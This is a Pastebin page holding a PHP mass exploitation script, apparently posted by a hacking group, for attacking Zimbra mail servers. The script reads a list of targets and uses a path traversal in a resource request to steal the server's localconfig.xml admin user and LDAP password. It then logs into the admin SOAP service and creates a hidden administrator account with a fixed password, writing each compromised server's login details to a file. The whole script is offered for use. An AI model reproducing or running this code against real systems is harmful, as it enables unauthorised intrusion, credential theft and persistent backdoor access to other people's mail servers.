Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- // Created by L3xcode - CybeerXploit
- // big thx to: magn0m.
- // Recoded By : l3xcode
- error_reporting(0);
- function ambilKata($param, $kata1, $kata2){
- if(strpos($param, $kata1) === FALSE) return FALSE;
- if(strpos($param, $kata2) === FALSE) return FALSE;
- $start = strpos($param, $kata1) + strlen($kata1);
- $end = strpos($param, $kata2, $start);
- $return = substr($param, $start, $end - $start);
- return $return;
- }
- function ngecek($url,$post){
- $ch = curl_init ("$url");
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
- curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt ($ch, CURLOPT_POST, 1);
- curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
- curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
- curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
- $data2 = curl_exec ($ch);
- return $data2;
- }
- function nganu_body($toket,$req){
- $body = "<soap:Envelope xmlns:soap=\"http://www.w3.org/2003/05/soap-envelope\"><soap:Header><context xmlns=\"urn:zimbra
- \"><authToken>$toket</authToken></context></soap:Header><soap:Body>$req</soap:Body></soap:Envelope>";
- return $body;
- }
- if($argv[1]==""){
- echo "\nusage: php exploit.php list.txt\n\n";
- }
- else{
- $target=@file_get_contents($argv[1]);
- $ss=explode("\r\n",$target);
- foreach ($ss as $links){
- $user_baru = "evoo";
- $pwd_baru = "evoo";
- $lfi = "res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?
- v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00";
- $link_lfi = "$links/$lfi";
- echo "=> $links\n";
- $ch2 = curl_init ("$link_lfi");
- curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt ($ch2, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101
- Firefox/32.0");
- curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt ($ch2, CURLOPT_ENCODING, "gzip");
- curl_setopt($ch2, CURLOPT_COOKIEJAR,'coker_log');
- curl_setopt($ch2, CURLOPT_COOKIEFILE,'coker_log');
- $ambil = curl_exec ($ch2);
- $get_user = explode('<key"]="name=\"zimbra_user\">', $ambil);
- preg_match('/a\["<value>(.*?)<\/value>/', $get_user[1], $user);
- $get_pwd = explode('<key"]="name=\"zimbra_ldap_password\">', $ambil);
- preg_match('/a\["<value>(.*?)<\/value>/', $get_pwd[1], $pwd);
- if($user[1] or $pwd[1] != ""){
- echo "[+] Pulen nih...\n";
- $body = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>
- <env:Envelope xmlns:env=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:ns1=\"urn:zimbraAdmin\"
- xmlns:ns2=\"urn:zimbraAdmin\"><env:Header><ns2:context/></env:Header><env:Body><ns1:AuthRequest><account by=\"name\">$user
- [1]</account><password>$pwd[1]</password></ns1:AuthRequest></env:Body></env:Envelope>";
- $link = "https://$target:7071/service/admin/soap";
- $token = ngecek($link,$body);
- preg_match('/<authToken>(.*)<\/authToken>/', $token, $toket);
- if($toket[1]==""){
- echo "[-] gagal ngambil token\n\n";
- break;
- }
- else{
- $req = @("<GetAllDomainsRequest xmlns=\"urn:zimbraAdmin
- \"></GetAllDomainsRequest>");
- $body2 = nganu_body($toket[1],$req);
- $liat = ngecek($link,$body2);
- preg_match('/<a n=\"zimbraDomainName\">(.*?)<\/a>/', $liat, $domain);
- echo "[+] Creating Account...\n";
- $req2 = "<CreateAccountRequest xmlns=\"urn:zimbraAdmin\"><name>$user_baru@$domain
- [1]</name><password>$pwd_baru</password></CreateAccountRequest>";
- $body3 = nganu_body($toket[1],$req2);
- $liat2 = ngecek($link,$body3);
- preg_match('/account id="(.*)" name="/', $liat2, $new);
- $req3 = "<ModifyAccountRequest xmlns=\"urn:zimbraAdmin\"><id>$new[1]</id><a n=
- \"zimbraIsAdminAccount\">TRUE</a></ModifyAccountRequest>";
- $body4 = nganu_body($toket[1],$req3);
- $liat3 = ngecek($link,$body4);
- echo "[+] Sukses\n";
- echo "[+] Login Url: https://$target:7071/zimbraAdmin/\n# Account: $user_baru@
- $domain[1]\n# Password: $pwd_baru\n\n";
- $fp = fopen('hasil.txt', 'a+');
- fwrite($fp, "[+] Login Url: https://$target:7071/zimbraAdmin/\n# Account: $user_baru@$domain[1]\n# Password:
- $pwd_baru\n\n");
- fclose($fp);
- }
- }
- else{
- echo "[-] ngk pulen\n";
- }
- }
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement